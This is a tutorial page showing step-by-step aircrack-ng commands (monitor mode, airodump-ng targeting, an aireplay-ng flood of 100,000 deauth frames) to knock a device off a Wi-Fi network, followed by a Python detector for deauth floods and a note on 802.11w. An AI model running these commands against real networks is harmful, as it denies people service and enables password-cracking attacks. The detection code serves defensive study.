Disclaimer: All content on this page is for educational purposes only. Please do not attack any network you don't have permission to test.
Step 1: Identifying the target
The first step in any attack is identifying the target.
Set the Wifi adapter to monitor mode to start reading the network traffic. It's as simple as running a couple of commands.
Bring down the Wifi adapter
ifconfig wlan0 down
Change the mode
iwconfig wlan0 mode monitor
Kill any process that might interfere
airmon-ng check kill
Bring the Wifi adapter back up
ifconfig wlan0 up
Next, we run the following to list all the networks available to identify the target network.
airodump-ng wlan0
I am not going to show the output of these requests for security reasons. We identify the BSSID and the channel of the network from the output and pass them to airodump-ng to do a targeted scan.
airodump-ng --bssid 00:00:00:00:00:00 -c 4 wlan0
Step 2: Firing the De-auth attack
Now we fire the deauth attack. Basically, we want to mimic the device connected to the network and start sending deauth requests. We spam it with a huge number of requests to deny service to the device. We don't want to do that manually, so we will use a tool for it.
aireplay-ng --deauth 100000 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0
Here, we are sending 100000 deauth requests. The router MAC follows -a and the device MAC follows -c. Both MAC addresses are taken from the output of airodump-ng.
And that's it: we will be able to successfully stop a person from using their Wifi. The attack can be used for DoS (Denial of Service) or to force the user to reconnect and capture the handshake. This way we can build upon this attack to crack a Wifi password.
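Seen from the monitoring side, a burst like the one above stands out as many deauthentication frames for one router/device pair within a short time. The following is an added example, not part of the original page: a small detector that parses raw 802.11 deauth frames and counts them per pair in a sliding window. The window length, the threshold, the MAC addresses and the sample frames are constructed assumptions, and frames are assumed to start at the 802.11 header (any radiotap header already stripped).

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))

def build_deauth(receiver, transmitter, bssid, reason):
    """Build a constructed deauth frame (24-byte header + reason code) for the sample."""
    header = bytes([DEAUTH_FC0, 0x00]) + b"\x00\x00"  # frame control + duration
    header += mac_bytes(receiver) + mac_bytes(transmitter) + mac_bytes(bssid)
    return header + b"\x00\x00" + struct.pack("<H", reason)  # seq ctrl + reason

def parse_deauth(frame):
    """Return (receiver, transmitter, bssid, reason), or None if not a deauth frame."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    fmt = lambda b: ":".join(f"{x:02x}" for x in b)
    (reason,) = struct.unpack_from("<H", frame, 24)
    return fmt(frame[4:10]), fmt(frame[10:16]), fmt(frame[16:22]), reason

def detect_floods(capture, window_s=1.0, threshold=20):
    """capture: (timestamp_seconds, raw_frame) pairs in time order.
    Returns {(bssid, station): peak count per window} for pairs at or above threshold."""
    recent, alerts = defaultdict(deque), {}
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        receiver, transmitter, bssid, _reason = parsed
        # The station is whichever address is not the access point.
        station = receiver if transmitter == bssid else transmitter
        times = recent[(bssid, station)]
        times.append(ts)
        while times[0] < ts - window_s:  # drop timestamps older than the window
            times.popleft()
        if len(times) >= threshold:
            alerts[(bssid, station)] = max(alerts.get((bssid, station), 0), len(times))
    return alerts

# Constructed sample (locally administered MACs, not real devices).
AP, STA, STA2 = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"
SAMPLE = [(10.0 + i * 0.01,
           build_deauth(STA, AP, AP, 7) if i % 2 == 0 else build_deauth(AP, STA, AP, 7))
          for i in range(64)]                                   # burst in both directions
SAMPLE.append((12.0, build_deauth(AP, STA2, AP, 3)))            # one ordinary disconnect
SAMPLE.append((12.5, bytes([0x80, 0x00]) + bytes(24)))          # beacon: not a deauth

if __name__ == "__main__":
    for (bssid, station), count in detect_floods(SAMPLE).items():
        print(f"deauth flood: bssid={bssid} station={station} peak={count} per window")
```

Detection only tells you the flood is happening; networks that enable Protected Management Frames (802.11w) have clients discard deauth frames that are not authenticated.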